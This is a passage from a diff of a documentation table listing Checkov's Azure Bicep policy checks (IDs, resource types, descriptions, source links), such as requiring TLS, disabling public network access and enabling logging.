[AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) | -| 59 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | Bicep | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | -| 60 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | Bicep | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) | -| 61 | CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | Bicep | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) | -| 62 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | Bicep | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) | -| 63 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | Bicep | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) | -| 64 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Bicep | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) | -| 65 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure 
Files | Bicep | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) | -| 66 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | Bicep | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) | -| 67 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Bicep | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) | -| 68 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | Bicep | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) | -| 69 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Bicep | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) | -| 70 | CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | Bicep | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) | -| 71 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | -| 72 | CKV_AZURE_97 | resource | 
Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | -| 73 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Bicep | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) | -| 74 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | Bicep | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) | -| 75 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data Factory uses Git repository for source control | Bicep | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) | -| 76 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | Bicep | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) | -| 77 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | Bicep | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) | -| 78 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | Bicep | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) | -| 79 | CKV_AZURE_112 | resource | 
Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | Bicep | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) | -| 80 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | Bicep | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) | -| 81 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | Bicep | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) | -| 82 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | Bicep | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) | -| 83 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Bicep | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) | -| 84 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | Bicep | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) | -| 85 | CKV_AZURE_131 | parameter | string | SecureString parameter should not have hardcoded default values | Bicep | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/param/azure/SecureStringParameterNoHardcodedValue.py) | -| 86 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow 
privileged escalation by restricting management plane changes | Bicep | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) | -| 87 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | Bicep | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) | -| 88 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | -| 89 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | -| 90 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | Bicep | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) | -| 91 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | -| 92 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | 
[NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | -| 93 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | Bicep | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) | -| 94 | CKV_AZURE_236 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | Bicep | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) | -| 95 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Bicep | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) | +| | Id | Type | Entity | Policy | IaC | Resource Link | +|-----|---------------|-----------|------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------|-------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| 0 | CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) | +| 1 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | Bicep | 
[AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) | +| 2 | CKV_AZURE_3 | resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | Bicep | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountsTransportEncryption.py) | +| 3 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | Bicep | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) | +| 4 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | Bicep | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) | +| 5 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an API Server Authorized IP Ranges enabled | Bicep | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) | +| 6 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | Bicep | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) | +| 7 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | Bicep | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) | +| 8 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | Bicep | 
[NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | +| 9 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | +| 10 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | +| 11 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | +| 12 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Bicep | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) | +| 13 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 14 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 15 | CKV_AZURE_12 | resource | 
Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 16 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 17 | CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | +| 18 | CKV_AZURE_13 | resource | config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | +| 19 | CKV_AZURE_14 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Bicep | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) | +| 20 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption | Bicep | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) | +| 21 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | Bicep | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) | +| 22 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure 
the web app has 'Client Certificates (Incoming client certificates)' set | Bicep | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) | +| 23 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | Bicep | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | +| 24 | CKV_AZURE_19 | resource | Microsoft.Security/pricings | Ensure that standard pricing tier is selected | Bicep | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | +| 25 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | Bicep | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | +| 26 | CKV_AZURE_21 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | +| 27 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | +| 28 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | +| 29 | CKV_AZURE_23 | resource | 
Microsoft.Sql/servers/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | +| 30 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | +| 31 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | +| 32 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Bicep | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml) | +| 33 | CKV_AZURE_24 | resource | Microsoft.Sql/servers/auditingSettings | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Bicep | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml) | +| 34 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is set to 'All' | Bicep | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) | +| 35 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Bicep | 
[SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) | +| 36 | CKV_AZURE_27 | resource | Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Bicep | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) | +| 37 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Bicep | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) | +| 38 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | Bicep | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) | +| 39 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | +| 40 | CKV_AZURE_30 | resource | configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | +| 41 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | 
[PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | +| 42 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | +| 43 | CKV_AZURE_32 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 44 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 45 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Bicep | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) | +| 46 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 47 | CKV_AZURE_34 | resource | blobServices/containers | Ensure that 'Public access level' is 
set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 48 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 49 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | Bicep | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | +| 50 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Bicep | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | +| 51 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | Bicep | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) | +| 52 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | Bicep | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) | +| 53 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom subscription owner roles are created | Bicep | 
[CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) | +| 54 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | Bicep | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) | +| 55 | CKV_AZURE_41 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | Bicep | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) | +| 56 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | Bicep | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) | +| 57 | CKV_AZURE_43 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Accounts adhere to the naming rules | Bicep | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountName.py) | +| 58 | CKV_AZURE_44 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | Bicep | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) | +| 59 | CKV_AZURE_45 | resource | Microsoft.Compute/virtualMachines | Ensure that no sensitive credentials are exposed in VM custom_data | Bicep | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMCredsInCustomData.py) | +| 60 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Bicep | 
[MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) | +| 61 | CKV_AZURE_48 | resource | Microsoft.DBforMariaDB/servers | Ensure 'public network access enabled' is set to 'False' for MariaDB servers | Bicep | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBPublicAccessDisabled.py) | +| 62 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) | +| 63 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | Bicep | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) | +| 64 | CKV_AZURE_52 | resource | Microsoft.Sql/servers | Ensure MSSQL is using the latest version of TLS encryption | Bicep | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py) | +| 65 | CKV_AZURE_53 | resource | Microsoft.DBforMySQL/servers | Ensure 'public network access enabled' is set to 'False' for mySQL servers | Bicep | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py) | +| 66 | CKV_AZURE_54 | resource | Microsoft.DBforMySQL/servers | Ensure MySQL is using the latest version of TLS encryption | Bicep | 